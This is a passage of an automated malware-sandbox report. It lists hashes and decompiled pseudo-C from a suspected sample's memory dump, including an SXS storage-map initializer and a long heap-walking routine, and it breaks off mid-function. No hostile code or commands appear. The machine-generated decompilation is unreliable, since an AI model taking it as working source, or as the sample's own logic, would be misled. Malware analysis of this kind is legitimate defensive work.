                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0$Flst
                                                        • API String ID: 0-758220159
                                                        • Opcode ID: 1ec8cb7e0d46fc927c2705a15869cb22629b1e0a47ed0b71f04b600fec6b9df4
                                                        • Instruction ID: 71fea0c09c7f08cfa2a2f76ef12190887e4d39530011e67872d6ebeb70e85374
                                                        • Opcode Fuzzy Hash: 1ec8cb7e0d46fc927c2705a15869cb22629b1e0a47ed0b71f04b600fec6b9df4
                                                        • Instruction Fuzzy Hash: 46416AB1A00648CFDB25CF99C9847ADFBF5EF88314F14802AE14ADF645DB319A45CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 82%
                                                        			E0181D4B0(signed int* __ecx, signed int __edx, void* _a4) {
                                                        				signed int _v8;
                                                        				void* _t17;
                                                        				signed int* _t26;
                                                        				signed int _t29;
                                                        				void* _t34;
                                                        				signed int _t41;
                                                        
                                                        				_push(__ecx);
                                                        				_push(__ecx);
                                                        				_v8 = _v8 & 0x00000000;
                                                        				_t26 = __ecx;
                                                        				_t41 = __edx;
                                                        				if(__ecx == 0 || __edx == 0) {
                                                        					_push(_t41);
                                                        					_push(_t26);
                                                        					E01875720(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Map        : 0x%p\nSXS:    EntryCount : 0x%lx\n", "RtlpInitializeAssemblyStorageMap");
                                                        					_t17 = 0xc000000d;
                                                        				} else {
                                                        					_t34 = _a4;
                                                        					if(_t34 == 0) {
                                                        						_t29 = 4;
                                                        						_t17 = E0181F3D5( &_v8, __edx * _t29, __edx * _t29 >> 0x20);
                                                        						if(_t17 >= 0) {
                                                        							_t34 = E01804620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                        							if(_t34 != 0) {
                                                        								_v8 = 1;
                                                        								goto L3;
                                                        							} else {
                                                        								_t17 = 0xc0000017;
                                                        							}
                                                        						}
                                                        					} else {
                                                        						L3:
                                                        						if(_t41 != 0) {
                                                        							memset(_t34, 0, _t41 << 2);
                                                        						}
                                                        						 *_t26 = _v8;
                                                        						_t17 = 0;
                                                        						_t26[1] = _t41;
                                                        						_t26[2] = _t34;
                                                        					}
                                                        				}
                                                        				return _t17;
                                                        			}










                                                        Strings
                                                        • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 0185B0B7
                                                        • RtlpInitializeAssemblyStorageMap, xrefs: 0185B0B2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                        • API String ID: 0-2653619699
                                                        • Opcode ID: 82bfd79a3951ca53c49dc7cf61f0ab8c7dd112eb0cccf616bd49d05190ced161
                                                        • Instruction ID: 721901203d94214abddd9fa224ec70d407023d69ca53824bb3ee3efd53be01c6
                                                        • Opcode Fuzzy Hash: 82bfd79a3951ca53c49dc7cf61f0ab8c7dd112eb0cccf616bd49d05190ced161
                                                        • Instruction Fuzzy Hash: 4E112972B40208BBF7248E9D8D81FABB6ADDB94B14F148169BF04DB244E671DF00C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 71%
                                                        			E0188EB8A(signed int __ecx, signed int __edx, char _a4) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int _v20;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* __ebp;
                                                        				signed int _t258;
                                                        				signed int _t260;
                                                        				signed int _t261;
                                                        				signed char _t262;
                                                        				signed int _t263;
                                                        				char* _t264;
                                                        				signed int _t265;
                                                        				intOrPtr _t267;
                                                        				signed int _t271;
                                                        				signed char _t272;
                                                        				signed short _t273;
                                                        				signed int _t277;
                                                        				signed char _t281;
                                                        				signed short _t283;
                                                        				signed short _t288;
                                                        				signed char _t289;
                                                        				signed short _t290;
                                                        				signed short _t292;
                                                        				signed short _t294;
                                                        				signed char _t295;
                                                        				intOrPtr _t296;
                                                        				signed int _t297;
                                                        				signed char _t298;
                                                        				unsigned int _t302;
                                                        				intOrPtr* _t303;
                                                        				signed int _t304;
                                                        				unsigned int _t306;
                                                        				signed short _t307;
                                                        				signed short _t308;
                                                        				signed int _t311;
                                                        				signed short _t314;
                                                        				signed short _t326;
                                                        				signed char _t329;
                                                        				signed short _t330;
                                                        				signed int _t332;
                                                        				void* _t333;
                                                        				signed short _t337;
                                                        				signed int _t339;
                                                        				void* _t340;
                                                        				signed short _t344;
                                                        				signed int _t347;
                                                        				signed int _t349;
                                                        				signed int _t351;
                                                        				signed int _t359;
                                                        				signed short _t362;
                                                        				signed int _t369;
                                                        				signed int _t376;
                                                        				signed short _t377;
                                                        				signed short* _t378;
                                                        				signed short _t381;
                                                        				signed char _t383;
                                                        				signed short _t384;
                                                        				signed short _t385;
                                                        				signed int _t390;
                                                        				signed int _t393;
                                                        				void* _t400;
                                                        				signed short _t406;
                                                        				signed int _t407;
                                                        				signed short _t408;
                                                        				signed short _t409;
                                                        				signed short _t410;
                                                        				signed short _t411;
                                                        				intOrPtr _t415;
                                                        				signed int _t416;
                                                        				signed char _t417;
                                                        				signed int _t418;
                                                        				unsigned int _t423;
                                                        				unsigned int _t431;
                                                        				signed int _t437;
                                                        				signed int _t442;
                                                        				intOrPtr _t443;
                                                        				void* _t449;
                                                        				intOrPtr _t451;
                                                        				signed short _t453;
                                                        				signed int _t455;
                                                        
                                                        				_t258 =  *0x18dd360 ^ _t455;
                                                        				_v8 = _t258;
                                                        				_t452 = __ecx;
                                                        				_t395 = __edx;
                                                        				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                        					__eflags =  *(__ecx + 0x40) & 0x61000000;
                                                        					asm("bt dword [edi+0x40], 0x1c");
                                                        					__eflags = (_t258 & 0xffffff00 | ( *(__ecx + 0x40) & 0x61000000) >= 0x00000000) & (__ecx & 0xffffff00 | __eflags != 0x00000000);
                                                        					if(__eflags == 0) {
                                                        						L5:
                                                        						_v12 = _v12 & 0x00000000;
                                                        						_t260 =  *_t395;
                                                        						_push(2);
                                                        						__eflags = _t260;
                                                        						if(_t260 != 0) {
                                                        							_t399 =  *(_t395 + 0xa) & 0x0000ffff;
                                                        							__eflags = _t399 & 0x00001002;
                                                        							if((_t399 & 0x00001002) == 0) {
                                                        								goto L25;
                                                        							}
                                                        							_t441 = _t399 & 0x00000002;
                                                        							__eflags = _t441;
                                                        							if(_t441 == 0) {
                                                        								L14:
                                                        								__eflags = _a4;
                                                        								if(_a4 == 0) {
                                                        									L17:
                                                        									_t453 =  *(_t395 + 4) + _t260;
                                                        									__eflags = _t399 & 0x00001000;
                                                        									if((_t399 & 0x00001000) != 0) {
                                                        										_t441 = _t260 - 0x18;
                                                        										_t399 = _t452;
                                                        										_t260 = E0188D42F(_t452, _t260 - 0x18);
                                                        									}
                                                        									__eflags = _a4;
                                                        									if(_a4 == 0) {
                                                        										L21:
                                                        										_t451 =  *((intOrPtr*)(_t260 + 0x10));
                                                        										_t399 = 2;
                                                        										__eflags = _t451 - _t452 + 0xa4;
                                                        										if(_t451 == _t452 + 0xa4) {
                                                        											__eflags =  *((intOrPtr*)(_t452 + 0xda)) - _t399;
                                                        											if( *((intOrPtr*)(_t452 + 0xda)) != _t399) {
                                                        												goto L62;
                                                        											}
                                                        											_t441 =  *(_t452 + 0xd4);
                                                        											goto L63;
                                                        										}
                                                        										_t441 = _t451 + 0xfffffff0;
                                                        										goto L63;
                                                        									} else {
                                                        										__eflags = _t453 -  *((intOrPtr*)(_t260 + 0x28));
                                                        										if(_t453 <  *((intOrPtr*)(_t260 + 0x28))) {
                                                        											goto L82;
                                                        										}
                                                        										goto L21;
                                                        									}
                                                        								}
                                                        								__eflags = _t441;
                                                        								if(_t441 == 0) {
                                                        									goto L17;
                                                        								}
                                                        								_t453 =  *(_t260 + 0x24);
                                                        								goto L82;
                                                        							} else {
                                                        								__eflags =  *((char*)(_t452 + 0xda)) - 2;
                                                        								if( *((char*)(_t452 + 0xda)) != 2) {
                                                        									_t437 = 0;
                                                        									__eflags = 0;
                                                        								} else {
                                                        									_t437 =  *(_t452 + 0xd4);
                                                        								}
                                                        								__eflags = _t260 - _t437;
                                                        								if(_t260 == _t437) {
                                                        									goto L61;
                                                        								} else {
                                                        									_t399 =  *(_t395 + 0xa) & 0x0000ffff;
                                                        									goto L14;
                                                        								}
                                                        							}
                                                        						} else {
                                                        							_t441 = _t452;
                                                        							L63:
                                                        							_t453 = 0;
                                                        							__eflags = _t441;
                                                        							if(_t441 != 0) {
                                                        								__eflags =  *((intOrPtr*)(_t452 + 0xda)) - _t399;
                                                        								if( *((intOrPtr*)(_t452 + 0xda)) != _t399) {
                                                        									_t359 = 0;
                                                        									__eflags = 0;
                                                        								} else {
                                                        									_t359 =  *(_t452 + 0xd4);
                                                        								}
                                                        								__eflags = _t441 - _t359;
                                                        								if(_t441 == _t359) {
                                                        									_t441 = _t395;
                                                        									E018A6D15(_t452, _t395,  &_v12);
                                                        									goto L193;
                                                        								} else {
                                                        									 *_t395 = _t441;
                                                        									__eflags =  *(_t452 + 0x4c) - _t453;
                                                        									if( *(_t452 + 0x4c) == _t453) {
                                                        										_t362 =  *_t441 & 0x0000ffff;
                                                        									} else {
                                                        										_t377 =  *_t441;
                                                        										__eflags =  *(_t452 + 0x4c) & _t377;
                                                        										if(( *(_t452 + 0x4c) & _t377) != 0) {
                                                        											_t377 = _t377 ^  *(_t452 + 0x50);
                                                        											__eflags = _t377;
                                                        										}
                                                        										_t362 = _t377 & 0x0000ffff;
                                                        									}
                                                        									 *(_t395 + 4) = (_t362 & 0x0000ffff) << 3;
                                                        									 *(_t395 + 0xa) = _t399;
                                                        									 *(_t395 + 8) = _t453;
                                                        									 *(_t395 + 0xc) =  *((intOrPtr*)(_t441 + 0x20)) -  *(_t441 + 0x2c) << 0xc;
                                                        									_t369 =  *(_t441 + 0x2c) << 0xc;
                                                        									 *(_t395 + 0x10) = _t369;
                                                        									__eflags =  *(_t441 + 0xc) & _t399;
                                                        									if(( *(_t441 + 0xc) & _t399) != 0) {
                                                        										_t376 = _t369 + 0x1000;
                                                        										__eflags = _t376;
                                                        										 *(_t395 + 0x10) = _t376;
                                                        									}
                                                        									 *(_t395 + 0x14) =  *((intOrPtr*)(_t441 + 0x24)) + (( !( *( *((intOrPtr*)(_t441 + 0x24)) + 2)) & 0x00000001) + 1) * 8;
                                                        									 *((intOrPtr*)(_t395 + 0x18)) =  *((intOrPtr*)(_t441 + 0x28));
                                                        									L82:
                                                        									__eflags = _t453;
                                                        									if(_t453 == 0) {
                                                        										L193:
                                                        										_t263 = E01807D50();
                                                        										__eflags = _t263;
                                                        										if(_t263 == 0) {
                                                        											_t264 = 0x7ffe0380;
                                                        										} else {
                                                        											_t264 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        										}
                                                        										__eflags =  *_t264;
                                                        										if( *_t264 != 0) {
                                                        											_t267 =  *[fs:0x30];
                                                        											__eflags =  *(_t267 + 0x240) & 0x00000001;
                                                        											if(( *(_t267 + 0x240) & 0x00000001) != 0) {
                                                        												__eflags = _v12 - 0x8000001a;
                                                        												if(_v12 != 0x8000001a) {
                                                        													E018A1BA8(_t452);
                                                        												}
                                                        											}
                                                        										}
                                                        										_t265 = _v12;
                                                        										goto L201;
                                                        									}
                                                        									_t272 =  *((intOrPtr*)(_t453 + 7));
                                                        									__eflags = _t272 & 0x00000040;
                                                        									if((_t272 & 0x00000040) == 0) {
                                                        										__eflags = _t272 - 4;
                                                        										if(_t272 != 4) {
                                                        											_t273 = _t453;
                                                        											L89:
                                                        											 *_t395 = _t273 + 8;
                                                        											_t441 = 2;
                                                        											 *(_t395 + 0xa) = 1;
                                                        											__eflags =  *((intOrPtr*)(_t452 + 0xda)) - _t441;
                                                        											if( *((intOrPtr*)(_t452 + 0xda)) != _t441) {
                                                        												_t277 = 0;
                                                        												__eflags = 0;
                                                        											} else {
                                                        												_t277 =  *(_t452 + 0xd4);
                                                        											}
                                                        											__eflags = _t277;
                                                        											if(_t277 == 0) {
                                                        												L97:
                                                        												_t281 =  *(_t452 + 0x4c) >> 0x00000014 &  *(_t452 + 0x52) ^  *(_t453 + 2);
                                                        												__eflags = _t281 & 0x00000001;
                                                        												if((_t281 & 0x00000001) == 0) {
                                                        													 *_t395 = _t453 + 0x10;
                                                        													__eflags =  *(_t452 + 0x4c);
                                                        													if( *(_t452 + 0x4c) == 0) {
                                                        														_t283 =  *_t453 & 0x0000ffff;
                                                        													} else {
                                                        														_t288 =  *_t453;
                                                        														__eflags =  *(_t452 + 0x4c) & _t288;
                                                        														if(( *(_t452 + 0x4c) & _t288) != 0) {
                                                        															_t288 = _t288 ^  *(_t452 + 0x50);
                                                        															__eflags = _t288;
                                                        														}
                                                        														_t283 = _t288 & 0x0000ffff;
                                                        													}
                                                        													 *(_t395 + 4) = (_t283 & 0x0000ffff) * 8 - 0x10;
                                                        													 *((char*)(_t395 + 9)) =  *(_t453 + 6);
                                                        													 *(_t395 + 0xa) = 0;
                                                        													 *(_t395 + 8) = 0x10;
                                                        													 *(_t395 + 0x14) = 0x10;
                                                        													goto L193;
                                                        												}
                                                        												_t289 =  *((intOrPtr*)(_t453 + 7));
                                                        												__eflags = _t289 & 0x00000040;
                                                        												if((_t289 & 0x00000040) == 0) {
                                                        													__eflags = _t289 - 4;
                                                        													if(_t289 != 4) {
                                                        														_t290 = _t453;
                                                        														L104:
                                                        														 *_t395 = _t290 + 8;
                                                        														_t399 =  *((intOrPtr*)(_t453 + 7));
                                                        														__eflags = _t399 - 4;
                                                        														if(_t399 == 4) {
                                                        															__eflags =  *(_t452 + 0x4c);
                                                        															if( *(_t452 + 0x4c) == 0) {
                                                        																_t292 =  *_t453 & 0x0000ffff;
                                                        															} else {
                                                        																_t308 =  *_t453;
                                                        																__eflags =  *(_t452 + 0x4c) & _t308;
                                                        																if(( *(_t452 + 0x4c) & _t308) != 0) {
                                                        																	_t308 = _t308 ^  *(_t452 + 0x50);
                                                        																	__eflags = _t308;
                                                        																}
                                                        																_t292 = _t308 & 0x0000ffff;
                                                        															}
                                                        															 *((char*)(_t395 + 9)) = 0x40;
                                                        															_t294 = 0x4001;
                                                        															 *(_t395 + 4) =  *((intOrPtr*)(_t453 - 8)) - (_t292 & 0x0000ffff);
                                                        															 *(_t395 + 0xa) = 0x4001;
                                                        															__eflags =  *(_t452 + 0x4c);
                                                        															if( *(_t452 + 0x4c) == 0) {
                                                        																_t406 =  *_t453 & 0x0000ffff;
                                                        															} else {
                                                        																_t307 =  *_t453;
                                                        																__eflags =  *(_t452 + 0x4c) & _t307;
                                                        																if(( *(_t452 + 0x4c) & _t307) != 0) {
                                                        																	_t307 = _t307 ^  *(_t452 + 0x50);
                                                        																	__eflags = _t307;
                                                        																}
                                                        																_t406 = _t307 & 0x0000ffff;
                                                        																_t294 =  *(_t395 + 0xa) & 0x0000ffff;
                                                        															}
                                                        															_t407 = _t406 & 0x0000ffff;
                                                        															 *(_t395 + 8) = _t407;
                                                        															__eflags = _t441 & _t294;
                                                        															if((_t441 & _t294) == 0) {
                                                        																 *(_t395 + 0x14) = _t407;
                                                        															}
                                                        															_t408 = _t294 & 0x0000ffff;
                                                        															L166:
                                                        															__eflags =  *(_t452 + 0x4c);
                                                        															if( *(_t452 + 0x4c) == 0) {
                                                        																_t295 =  *(_t453 + 2);
                                                        																_t409 = _t408 & 0x0000ffff;
                                                        															} else {
                                                        																_t306 =  *_t453;
                                                        																__eflags =  *(_t452 + 0x4c) & _t306;
                                                        																if(( *(_t452 + 0x4c) & _t306) != 0) {
                                                        																	_t306 = _t306 ^  *(_t452 + 0x50);
                                                        																	__eflags = _t306;
                                                        																}
                                                        																_t409 =  *(_t395 + 0xa) & 0x0000ffff;
                                                        																_t295 = _t306 >> 0x10;
                                                        															}
                                                        															__eflags = _t441 & _t295;
                                                        															if((_t441 & _t295) == 0) {
                                                        																_t296 =  *[fs:0x30];
                                                        																_t410 = _t409 & 0x0000ffff;
                                                        																__eflags =  *(_t296 + 0x68) & 0x00000800;
                                                        																if(( *(_t296 + 0x68) & 0x00000800) != 0) {
                                                        																	_t297 =  *(_t453 + 3) & 0x000000ff;
                                                        																} else {
                                                        																	_t297 = 0;
                                                        																}
                                                        																 *(_t395 + 0x10) = _t297;
                                                        															} else {
                                                        																_t441 = _t453;
                                                        																_t303 = E0188D380(_t452, _t453);
                                                        																 *(_t395 + 0xc) =  *(_t303 + 4);
                                                        																 *((short*)(_t395 + 0x12)) =  *_t303;
                                                        																_t415 =  *[fs:0x30];
                                                        																__eflags =  *(_t415 + 0x68) & 0x00000800;
                                                        																if(( *(_t415 + 0x68) & 0x00000800) != 0) {
                                                        																	_t304 =  *(_t303 + 2) & 0x0000ffff;
                                                        																} else {
                                                        																	_t304 = 0;
                                                        																}
                                                        																 *(_t395 + 0x10) = _t304;
                                                        																 *(_t395 + 0xa) =  *(_t395 + 0xa) | 0x00000010;
                                                        																_t410 =  *(_t395 + 0xa) & 0x0000ffff;
                                                        															}
                                                        															__eflags =  *(_t452 + 0x4c);
                                                        															if( *(_t452 + 0x4c) == 0) {
                                                        																_t298 =  *(_t453 + 2);
                                                        																_t411 = _t410 & 0x0000ffff;
                                                        															} else {
                                                        																_t302 =  *_t453;
                                                        																__eflags =  *(_t452 + 0x4c) & _t302;
                                                        																if(( *(_t452 + 0x4c) & _t302) != 0) {
                                                        																	_t302 = _t302 ^  *(_t452 + 0x50);
                                                        																	__eflags = _t302;
                                                        																}
                                                        																_t411 =  *(_t395 + 0xa) & 0x0000ffff;
                                                        																_t298 = _t302 >> 0x10;
                                                        															}
                                                        															 *(_t395 + 0xa) = _t298 & 0xe0 | _t411;
                                                        															goto L193;
                                                        														}
                                                        														__eflags = _t399 - 3;
                                                        														if(_t399 == 3) {
                                                        															_t408 = 0x1000;
                                                        															 *_t395 =  *(_t453 + 0x18);
                                                        															 *(_t395 + 0x14) =  *(_t395 + 0x14) & 0x00000000;
                                                        															 *(_t395 + 4) =  *(_t453 + 0x1c);
                                                        															 *(_t395 + 8) = 0x10000000;
                                                        															goto L166;
                                                        														}
                                                        														__eflags = _t399 - 1;
                                                        														if(_t399 != 1) {
                                                        															_t442 =  *(_t452 + 0x4c);
                                                        															__eflags = _t442;
                                                        															if(_t442 == 0) {
                                                        																_t311 =  *_t453 & 0x0000ffff;
                                                        															} else {
                                                        																_t344 =  *_t453;
                                                        																_t442 =  *(_t452 + 0x4c);
                                                        																__eflags = _t344 & _t442;
                                                        																if((_t344 & _t442) != 0) {
                                                        																	_t344 = _t344 ^  *(_t452 + 0x50);
                                                        																	__eflags = _t344;
                                                        																}
                                                        																_t399 =  *((intOrPtr*)(_t453 + 7));
                                                        																_t311 = _t344 & 0x0000ffff;
                                                        															}
                                                        															_v20 = _t311;
                                                        															__eflags = _t399 - 5;
                                                        															if(_t399 != 5) {
                                                        																__eflags = _t399 & 0x00000040;
                                                        																if((_t399 & 0x00000040) == 0) {
                                                        																	__eflags = (_t399 & 0x0000003f) - 0x3f;
                                                        																	if((_t399 & 0x0000003f) == 0x3f) {
                                                        																		__eflags = _t399;
                                                        																		if(_t399 >= 0) {
                                                        																			__eflags = _t442;
                                                        																			if(_t442 == 0) {
                                                        																				_t314 =  *_t453 & 0x0000ffff;
                                                        																			} else {
                                                        																				_t337 =  *_t453;
                                                        																				__eflags =  *(_t452 + 0x4c) & _t337;
                                                        																				if(( *(_t452 + 0x4c) & _t337) != 0) {
                                                        																					_t337 = _t337 ^  *(_t452 + 0x50);
                                                        																					__eflags = _t337;
                                                        																				}
                                                        																				_t314 = _t337 & 0x0000ffff;
                                                        																			}
                                                        																		} else {
                                                        																			_t431 = _t453 >> 0x00000003 ^  *_t453 ^  *0x18d874c ^ _t452;
                                                        																			__eflags = _t431;
                                                        																			if(_t431 == 0) {
                                                        																				_t339 = _t453 - (_t431 >> 0xd);
                                                        																				__eflags = _t339;
                                                        																				_t340 =  *_t339;
                                                        																			} else {
                                                        																				_t340 = 0;
                                                        																			}
                                                        																			_t314 =  *((intOrPtr*)(_t340 + 0x14));
                                                        																		}
                                                        																		_t416 =  *(_t453 + (_t314 & 0xffff) * 8 - 4);
                                                        																	} else {
                                                        																		_t416 = _t399 & 0x3f;
                                                        																	}
                                                        																} else {
                                                        																	_t416 =  *(_t453 + 4 + (_t399 & 0x3f) * 8) & 0x0000ffff;
                                                        																}
                                                        															} else {
                                                        																_t416 =  *(_t452 + 0x54) & 0x0000ffff ^  *(_t453 + 4) & 0x0000ffff;
                                                        															}
                                                        															 *(_t395 + 4) = ((_v20 & 0x0000ffff) << 3) - _t416;
                                                        															 *((char*)(_t395 + 9)) =  *(_t453 + 6);
                                                        															 *(_t395 + 0xa) = 1;
                                                        															_t417 =  *((intOrPtr*)(_t453 + 7));
                                                        															__eflags = _t417 - 5;
                                                        															if(_t417 != 5) {
                                                        																__eflags = _t417 & 0x00000040;
                                                        																if((_t417 & 0x00000040) == 0) {
                                                        																	__eflags = (_t417 & 0x0000003f) - 0x3f;
                                                        																	if((_t417 & 0x0000003f) == 0x3f) {
                                                        																		__eflags = _t417;
                                                        																		if(_t417 >= 0) {
                                                        																			__eflags =  *(_t452 + 0x4c);
                                                        																			if( *(_t452 + 0x4c) == 0) {
                                                        																				_t326 =  *_t453 & 0x0000ffff;
                                                        																			} else {
                                                        																				_t330 =  *_t453;
                                                        																				__eflags =  *(_t452 + 0x4c) & _t330;
                                                        																				if(( *(_t452 + 0x4c) & _t330) != 0) {
                                                        																					_t330 = _t330 ^  *(_t452 + 0x50);
                                                        																					__eflags = _t330;
                                                        																				}
                                                        																				_t326 = _t330 & 0x0000ffff;
                                                        																			}
                                                        																		} else {
                                                        																			_t423 = _t453 >> 0x00000003 ^  *_t453 ^  *0x18d874c ^ _t452;
                                                        																			__eflags = _t423;
                                                        																			if(_t423 == 0) {
                                                        																				_t332 = _t453 - (_t423 >> 0xd);
                                                        																				__eflags = _t332;
                                                        																				_t333 =  *_t332;
                                                        																			} else {
                                                        																				_t333 = 0;
                                                        																			}
                                                        																			_t326 =  *((intOrPtr*)(_t333 + 0x14));
                                                        																		}
                                                        																		_t418 =  *(_t453 + (_t326 & 0xffff) * 8 - 4);
                                                        																	} else {
                                                        																		_t418 = _t417 & 0x3f;
                                                        																	}
                                                        																} else {
                                                        																	_t418 =  *(_t453 + 4 + (_t417 & 0x3f) * 8) & 0x0000ffff;
                                                        																}
                                                        															} else {
                                                        																_t418 =  *(_t452 + 0x54) & 0x0000ffff ^  *(_t453 + 4) & 0x0000ffff;
                                                        															}
                                                        															_t329 =  *(_t395 + 0xa) & 0x0000ffff;
                                                        															_t441 = 2;
                                                        															 *(_t395 + 8) = _t418;
                                                        															__eflags = _t441 & _t329;
                                                        															if((_t441 & _t329) == 0) {
                                                        																 *(_t395 + 0x14) = _t418;
                                                        															}
                                                        															_t408 = _t329;
                                                        															goto L166;
                                                        														}
                                                        														 *(_t395 + 0xa) = 1;
                                                        														goto L26;
                                                        													}
                                                        													_t347 =  *(_t453 + 6) & 0x000000ff;
                                                        													L100:
                                                        													_t290 = _t453 + _t347 * 8;
                                                        													goto L104;
                                                        												}
                                                        												_t347 = _t289 & 0x3f;
                                                        												__eflags = _t347;
                                                        												goto L100;
                                                        											} else {
                                                        												_t441 = _t395;
                                                        												_t399 = _t452;
                                                        												_t349 = E018A67E2(_t452, _t395, _t452);
                                                        												__eflags = _t349;
                                                        												if(_t349 == 0) {
                                                        													_t441 = 2;
                                                        													goto L97;
                                                        												}
                                                        												__eflags =  *(_t395 + 0xa) & 0x00002000;
                                                        												if(( *(_t395 + 0xa) & 0x00002000) == 0) {
                                                        													goto L193;
                                                        												}
                                                        												L25:
                                                        												_t441 = 2;
                                                        												L26:
                                                        												__eflags =  *((intOrPtr*)(_t452 + 0xda)) - _t441;
                                                        												if( *((intOrPtr*)(_t452 + 0xda)) != _t441) {
                                                        													_t261 = 0;
                                                        													__eflags = 0;
                                                        												} else {
                                                        													_t261 =  *(_t452 + 0xd4);
                                                        												}
                                                        												__eflags = _t261;
                                                        												if(_t261 == 0) {
                                                        													L32:
                                                        													__eflags =  *(_t395 + 0xa) & 0x00000001;
                                                        													_t400 =  *_t395;
                                                        													if(( *(_t395 + 0xa) & 0x00000001) == 0) {
                                                        														_t399 = _t400 + 0xfffffff0;
                                                        														__eflags =  *(_t452 + 0x4c);
                                                        														if( *(_t452 + 0x4c) == 0) {
                                                        															_t453 =  *_t399 & 0x0000ffff;
                                                        														} else {
                                                        															_t381 =  *_t399;
                                                        															__eflags =  *(_t452 + 0x4c) & _t381;
                                                        															if(( *(_t452 + 0x4c) & _t381) != 0) {
                                                        																_t381 = _t381 ^  *(_t452 + 0x50);
                                                        																__eflags = _t381;
                                                        															}
                                                        															_t453 = _t381 & 0x0000ffff;
                                                        														}
                                                        														_t262 =  *(_t399 + 6);
                                                        														__eflags = _t262;
                                                        														if(_t262 == 0) {
                                                        															_t441 = _t452;
                                                        														} else {
                                                        															_t441 = (_t399 & 0xffff0000) - ((_t262 & 0x000000ff) << 0x10) + 0x10000;
                                                        														}
                                                        														__eflags = _t441;
                                                        														if(_t441 == 0) {
                                                        															L192:
                                                        															_v12 = 0xc0000141;
                                                        															goto L193;
                                                        														} else {
                                                        															__eflags =  *((char*)(_t399 + 7)) - 3;
                                                        															if( *((char*)(_t399 + 7)) != 3) {
                                                        																_t271 = _t453 & 0x0000ffff;
                                                        																L81:
                                                        																_t453 = _t399 + _t271 * 8;
                                                        																goto L82;
                                                        															}
                                                        															L58:
                                                        															__eflags =  *(_t399 + 0x1c) + 0x20 + _t399 -  *((intOrPtr*)(_t441 + 0x28));
                                                        															if( *(_t399 + 0x1c) + 0x20 + _t399 <  *((intOrPtr*)(_t441 + 0x28))) {
                                                        																 *_t395 =  *(_t399 + 0x18);
                                                        																 *(_t395 + 0x14) =  *(_t395 + 0x14) & 0x00000000;
                                                        																_t453 = 0;
                                                        																 *(_t395 + 4) =  *(_t399 + 0x1c);
                                                        																 *(_t395 + 8) = 0x10000000;
                                                        																goto L82;
                                                        															}
                                                        															_t443 =  *((intOrPtr*)(_t441 + 0x10));
                                                        															__eflags = _t443 - _t452 + 0xa4;
                                                        															if(_t443 == _t452 + 0xa4) {
                                                        																L61:
                                                        																_t399 = 2;
                                                        																L62:
                                                        																_t441 = 0;
                                                        																__eflags = 0;
                                                        																goto L63;
                                                        															}
                                                        															_t441 = _t443 + 0xfffffff0;
                                                        															_t399 = 2;
                                                        															goto L63;
                                                        														}
                                                        													}
                                                        													_t399 = _t400 + 0xfffffff8;
                                                        													__eflags =  *((char*)(_t399 + 7)) - 5;
                                                        													if( *((char*)(_t399 + 7)) == 5) {
                                                        														_t399 = _t399 - (( *(_t399 + 6) & 0x000000ff) << 3);
                                                        														__eflags = _t399;
                                                        													}
                                                        													__eflags =  *((intOrPtr*)(_t399 + 7)) - 4;
                                                        													if( *((intOrPtr*)(_t399 + 7)) != 4) {
                                                        														_t383 =  *(_t399 + 6);
                                                        														__eflags = _t383;
                                                        														if(_t383 == 0) {
                                                        															_t441 = _t452;
                                                        														} else {
                                                        															_t449 = (_t399 & 0xffff0000) - ((_t383 & 0x000000ff) << 0x10);
                                                        															_t383 =  *((intOrPtr*)(_t399 + 7));
                                                        															_t441 = _t449 + 0x10000;
                                                        														}
                                                        														__eflags = _t441;
                                                        														if(_t441 == 0) {
                                                        															goto L192;
                                                        														} else {
                                                        															__eflags = _t383 - 3;
                                                        															if(_t383 == 3) {
                                                        																goto L58;
                                                        															}
                                                        															__eflags =  *(_t452 + 0x4c);
                                                        															if( *(_t452 + 0x4c) == 0) {
                                                        																_t384 =  *_t399 & 0x0000ffff;
                                                        															} else {
                                                        																_t385 =  *_t399;
                                                        																__eflags =  *(_t452 + 0x4c) & _t385;
                                                        																if(( *(_t452 + 0x4c) & _t385) != 0) {
                                                        																	_t385 = _t385 ^  *(_t452 + 0x50);
                                                        																	__eflags = _t385;
                                                        																}
                                                        																_t384 = _t385 & 0x0000ffff;
                                                        															}
                                                        															_t271 = _t384 & 0x0000ffff;
                                                        															goto L81;
                                                        														}
                                                        													} else {
                                                        														_t453 =  *(_t399 - 0x18);
                                                        														_t378 = _t452 + 0x9c;
                                                        														L65:
                                                        														__eflags = _t453 - _t378;
                                                        														if(_t453 == _t378) {
                                                        															_v12 = 0x8000001a;
                                                        															goto L193;
                                                        														}
                                                        														_t453 = _t453 + 0x18;
                                                        														goto L82;
                                                        													}
                                                        												} else {
                                                        													_t441 = _t395;
                                                        													_t390 = E018A67E2(_t452, _t395, _t399);
                                                        													__eflags = _t390;
                                                        													if(_t390 == 0) {
                                                        														goto L32;
                                                        													}
                                                        													__eflags =  *(_t395 + 0xa) & 0x00002000;
                                                        													if(( *(_t395 + 0xa) & 0x00002000) == 0) {
                                                        														goto L193;
                                                        													}
                                                        													goto L32;
                                                        												}
                                                        											}
                                                        										}
                                                        										_t351 =  *(_t453 + 6) & 0x000000ff;
                                                        										L85:
                                                        										_t273 = _t453 + _t351 * 8;
                                                        										goto L89;
                                                        									}
